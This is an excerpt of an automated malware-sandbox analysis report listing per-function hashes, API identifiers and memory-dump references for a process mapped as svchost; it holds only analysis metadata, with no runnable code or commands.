                                      • Opcode Fuzzy Hash: d7065fdead552cd7c24bae6690dff7b267eb41f4dd761d5dc4f4ae79aff033b5
                                      • Instruction Fuzzy Hash: 98219421A09652C2FE688F419640279B2F1BF89FD8F040035DE4D8FB89DE3EE54A8700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 519d35b3cfcab39ddd00e55f368a9f3a7a84d20e149430486094a922609e6412
                                      • Instruction ID: ad2bae655636425987215e7dea2bc90f62ef29efa3fca4c779cd9367231e276f
                                      • Opcode Fuzzy Hash: 519d35b3cfcab39ddd00e55f368a9f3a7a84d20e149430486094a922609e6412
                                      • Instruction Fuzzy Hash: DD117221A1864AC2EB608F25E44067977B0FB55BA4F544332EF3E9A6D8DF2CE956C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Clientswprintf
                                      • String ID:
                                      • API String ID: 3322643685-0
                                      • Opcode ID: a723af60c7717834335850277151bb43de5b00edbb168dd4e843ec77410905fb
                                      • Instruction ID: 808ed0c293a353b4ed624aa01181373f93c1000431f6441eab5a5ce14ec0ab9f
                                      • Opcode Fuzzy Hash: a723af60c7717834335850277151bb43de5b00edbb168dd4e843ec77410905fb
                                      • Instruction Fuzzy Hash: 3B011E24A0C38AC2FF598F52A65437976F1AF86B80F044039DD4D8B795DF6CE996C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: f614b22a724d5105e42780bb6026b60baaeea42570bb6687910ca7acf2500620
                                      • Instruction ID: d778dbd899859176821ba5c6039b13fbdc7e6f9575cab863e14618d02e5a8cda
                                      • Opcode Fuzzy Hash: f614b22a724d5105e42780bb6026b60baaeea42570bb6687910ca7acf2500620
                                      • Instruction Fuzzy Hash: C0017C61B04B49C1EB048F4AA94406AB7B0BB99FD0B584135CF4C97325CE38E9418384
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF669ABE515,?,?,?,?,00007FF669AB4ADA,?,?,?,00007FF669AB4A66), ref: 00007FF669ABE4C4
                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF669ABE4D7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: d17bd8fc7b5d7fb72044c82ec2a440248b441aa1e6cb4ae9273fc3d44df9392e
                                      • Instruction ID: dd2124dd55d5dda05de024731006f3d941ffb6867ff75b6f71154509a61434a4
                                      • Opcode Fuzzy Hash: d17bd8fc7b5d7fb72044c82ec2a440248b441aa1e6cb4ae9273fc3d44df9392e
                                      • Instruction Fuzzy Hash: E3E09B61B14586C6DF598F59C4505E973F2BFC4B40F848136E90AC7A18EE3DE5458740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 1173176844-0
                                      • Opcode ID: f6116ca8ed12e0ee62487a4090934beebc7853c266b3c9a4a7aff1ced35f567e
                                      • Instruction ID: b795e9a77e18a8fd5e0c105ec261ad710b7a825e96ae56fc2ccb59370d61f81a
                                      • Opcode Fuzzy Hash: f6116ca8ed12e0ee62487a4090934beebc7853c266b3c9a4a7aff1ced35f567e
                                      • Instruction Fuzzy Hash: F2E04290E5D10BC2FA6C3EA215AA1B931F04F59775E185B30DE7D8D3D2EE1CB49A8114
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 485612231-0
                                      • Opcode ID: 5a10646ee943ef7144f57a8345da5bff8981a15ab22cb0347333ea4b4f2ec185
                                      • Instruction ID: 5cbbf7d6c91f75745abd383e3490b39499f3e96dd3a340d220f721b5d5a20599
                                      • Opcode Fuzzy Hash: 5a10646ee943ef7144f57a8345da5bff8981a15ab22cb0347333ea4b4f2ec185
                                      • Instruction Fuzzy Hash: EDE0EC51E49647C2FF19AFB2A8151B932F1AF89F84F449034DD1DCE352EE2CA58A4650
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 626f1d99765ef93fb9430353de88c01b1606786676b14069a367784bf1b81d0d
                                      • Instruction ID: ab5be18ae0a376460ab6b9535f94032450ce18167238d901701516631fbc04f1
                                      • Opcode Fuzzy Hash: 626f1d99765ef93fb9430353de88c01b1606786676b14069a367784bf1b81d0d
                                      • Instruction Fuzzy Hash: 49816A62706A86D6EE088F65D5941BCB2B1FB41F94F544235DF6D8F685CF38E4A48304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 78f6368587f03bef3d7ba744f1fd3c00229f5652d6eb29a9b4a921bea2e0f9a6
                                      • Instruction ID: 9fa5e0fe9a3159719205a6bd4583c3c4cf4f816e3c504ccbd1da4f85616d294f
                                      • Opcode Fuzzy Hash: 78f6368587f03bef3d7ba744f1fd3c00229f5652d6eb29a9b4a921bea2e0f9a6
                                      • Instruction Fuzzy Hash: C6518D62A08686D2EA509F25D4443FD37F1EB95BC8F540136EE8C4B79ADF2DE589C310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: LoadString$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2323602097-0
                                      • Opcode ID: c6c7bb94e0bcd877edc742b3384d85ce57f69d0859602b709a7750edba58c5e1
                                      • Instruction ID: 98179f92d913be1c6e9585c8ed8a5e6fb075419f158ea5950e7ab850fc90057a
                                      • Opcode Fuzzy Hash: c6c7bb94e0bcd877edc742b3384d85ce57f69d0859602b709a7750edba58c5e1
                                      • Instruction Fuzzy Hash: 00516B72A08B8AC1EB548F14E48017977F2FB89794F504236DE4D8B7A9DF2CE585C740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1011579015-0
                                      • Opcode ID: 0e84e94db4bb831982cd11884855e073d7e48c6337ad4e9e8e688b4001914b2f
                                      • Instruction ID: cbd0263e787cdf751912feb7e4adff36a8a29595a091c4c33861d52470ad9a00
                                      • Opcode Fuzzy Hash: 0e84e94db4bb831982cd11884855e073d7e48c6337ad4e9e8e688b4001914b2f
                                      • Instruction Fuzzy Hash: 53514E62A08686C3EB609F29D4853BD73F1FB95B88F440236EE8D9B6A5DF2CD441C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: f1619690963c536cc8c4f625a427be0e20c1c8abacfa75dfd7eb843acbb32b79
                                      • Instruction ID: 134863ea0218da79aeaf8e1947c65e4f4b8d35a42130b17cacd4d20fb466ebed
                                      • Opcode Fuzzy Hash: f1619690963c536cc8c4f625a427be0e20c1c8abacfa75dfd7eb843acbb32b79
                                      • Instruction Fuzzy Hash: 8A41B262B18A9582EA149E17EA4437AB2F1FB85BC0F548435EE4C8BF9EDF7CD4518300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID:
                                      • API String ID: 118556049-0
                                      • Opcode ID: a58617b45bac9171122bee061166508e831c9b9e82cc24bfa4501852497e3f4d
                                      • Instruction ID: 3c782eea4a4177bd344d84a78bdabd8780c8b00de09c64dddab1c9f02b03f322
                                      • Opcode Fuzzy Hash: a58617b45bac9171122bee061166508e831c9b9e82cc24bfa4501852497e3f4d
                                      • Instruction Fuzzy Hash: B131E2B2B04A8EC2DE14DF5A954457AA3F5AB58BD4F10C132EE5D8B799EE3CE081C300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: c0a220b38828d9883135ae7b326b06384b2289c20122941ee104f53db1899794
                                      • Instruction ID: 434f911cfbdbe85b2145bba34afd41a5a1b112ec090256e1484200f96172c9bf
                                      • Opcode Fuzzy Hash: c0a220b38828d9883135ae7b326b06384b2289c20122941ee104f53db1899794
                                      • Instruction Fuzzy Hash: 0A41BE66F18652C6FB109F65A9413AD36F0AF88BA8F444131EE4D9BB85DE39D486C310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 299e3fe2d611fb4018d5bac0f52dac5701642bc7e50f7ce273f0a9961b288a36
                                      • Instruction ID: baaae843fece17e07183fcc113844bddb927c9c55a7e3a783f5af5e2371a0064
                                      • Opcode Fuzzy Hash: 299e3fe2d611fb4018d5bac0f52dac5701642bc7e50f7ce273f0a9961b288a36
                                      • Instruction Fuzzy Hash: F9410322A18B4AC0EA249F25E14537D33F0EB55BD8F141636EE5D8BB9DDF3DE4828200
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: HandleModule$AddressFreeLibraryProc
                                      • String ID:
                                      • API String ID: 3947729631-0
                                      • Opcode ID: 11d68ba45937298fce3814947d5fe6ffabb0b5f45f2f40c7a1c6d355e3c54dc1
                                      • Instruction ID: a03f664f0bb03522501ea70fec533da432051258587d4f7a650937b619edc7b5
                                      • Opcode Fuzzy Hash: 11d68ba45937298fce3814947d5fe6ffabb0b5f45f2f40c7a1c6d355e3c54dc1
                                      • Instruction Fuzzy Hash: B5419C21A18A52C2FB649F64985027932F2BF95B54F50413ADE4EDF792DF3DEA48C380
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 680105476-0
                                      • Opcode ID: 29d7b9534cfb09c2d7b869dd861db1df4d8ba4138f2e55af9f39605554c0b9c9
                                      • Instruction ID: 8a7fe0c073f3121d603277eea5f7a909bdc0de59c69c28f4e9cd4bb8e03f44b9
                                      • Opcode Fuzzy Hash: 29d7b9534cfb09c2d7b869dd861db1df4d8ba4138f2e55af9f39605554c0b9c9
                                      • Instruction Fuzzy Hash: F8219021A08795D3EA549F92A44027972E0EB05BF0F690B31DE7D8BBC5DE7CE4914344
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: 1153f8908c183356b825f64be31e414c271fdaac26bc6ca5d5e0ef742709c68a
                                      • Instruction ID: e11e6330a4a523f2416a891672067a3d11e34399256d18633f91da94ae7da39f
                                      • Opcode Fuzzy Hash: 1153f8908c183356b825f64be31e414c271fdaac26bc6ca5d5e0ef742709c68a
                                      • Instruction Fuzzy Hash: 11113232A1D692C6EB549F54A88063AB2F4FF85380F550534EF8DCF79ADE2CE9409B40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 532136dcd1d542e9fe237077e8594a9c0df01694eefb6674f4b3ddc290915011
                                      • Instruction ID: 4dfbd76c3788d26be728ffeef98020c8de1eddbc9d8900ddf4790a35b21fde7f
                                      • Opcode Fuzzy Hash: 532136dcd1d542e9fe237077e8594a9c0df01694eefb6674f4b3ddc290915011
                                      • Instruction Fuzzy Hash: 1701E162E186C682EA249B28E44123D33F1FFC9794F405331EE9C4BB96EF6CE0448700
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ClassName
                                      • String ID:
                                      • API String ID: 1191326365-0
                                      • Opcode ID: c11b8f1c6216ca56f5b8f4aeb06c3e143bcfeb0edb37238df8e3ac888e37dffd
                                      • Instruction ID: 32b74732e0a314aec4eaddf1cd62e2cd2b3a7281abe101d121665eb142743a1d
                                      • Opcode Fuzzy Hash: c11b8f1c6216ca56f5b8f4aeb06c3e143bcfeb0edb37238df8e3ac888e37dffd
                                      • Instruction Fuzzy Hash: 93018422B18A8581EB508F52E6953BA73B0FF98BC8F444135DE4D8BB55DF3CE1988740
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Find$FileFirst$CloseErrorLast
                                      • String ID:
                                      • API String ID: 1464966427-0
                                      • Opcode ID: 53a927f6c22a7943a225c497b2bc8e3dd13ffe24a07be28bf3058a85aef6c9a4
                                      • Instruction ID: 2c7c2971c60a907b1fc456a9b88cbe8b87c6002faf689f355f185b4608e8d7a7
                                      • Opcode Fuzzy Hash: 53a927f6c22a7943a225c497b2bc8e3dd13ffe24a07be28bf3058a85aef6c9a4
                                      • Instruction Fuzzy Hash: 6AF0AF62909285C6EA509F75950817C37F09B2ABB4F140375DE7D4B2DBCE28D499C714
                                      APIs
                                      • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF669AD2284
                                        • Part of subcall function 00007FF669AD4030: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF669AD4038
                                        • Part of subcall function 00007FF669AD4030: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF669AD403D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
